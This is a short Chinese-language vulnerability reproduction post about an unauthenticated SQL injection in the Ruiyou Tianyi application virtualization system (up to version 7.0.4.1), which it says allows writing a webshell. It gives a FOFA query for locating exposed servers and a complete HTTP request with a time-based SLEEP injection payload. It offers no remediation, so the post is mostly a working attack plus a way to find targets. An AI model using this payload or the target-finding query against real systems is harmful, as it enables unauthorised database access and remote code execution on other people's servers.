Babing
Published on 2024-08-30 / 3 Visits
0
0

R1-3瑞友天翼-应用虚拟化系统-SQL

R1-3瑞友天翼-应用虚拟化系统-SQL

漏洞描述:

瑞友天翼应用虚拟化系统存在多处SQL注入漏洞,未经身份认证的远程攻击者可以利用该漏洞在目标系统写入Webshell执行任意代码。

影响版本:

瑞友天翼应用虚拟化系统 <= 7.0.4.1  

网站图片:

image-20240625134728820

网络测绘:

fofa语法:

FOFA:title=“瑞友天翼-应用虚拟化系统” || title=“瑞友应用虚拟化系统”

漏洞复现:

payload:

GET /RAPAgent.XGI?CMD=GETApplication&AppID=APP00000003&Language=ZH-CN&User=admin&PWD=e10adc3949ba59abbe56e057f20f883e&AuthType=0&Computer=CMD=GETApplication&AppID=APP00000001&Language=ZH-CN&User=admin&PWD=e10adc3949ba59abbe56e057f20f883e&AuthType=0&Computer=WIN-1TLJMBOFIT6%27%20AND%20(SELECT%209990%20FROM%20(SELECT(SLEEP(5)))Joqo)%20AND%20%27DseX%27=%27DseX&Finger=A45A2E5E3&IP=&Finger=A45A2E5E3&IP= HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip

效果图:
延时5秒
image-20240619152234721


Comment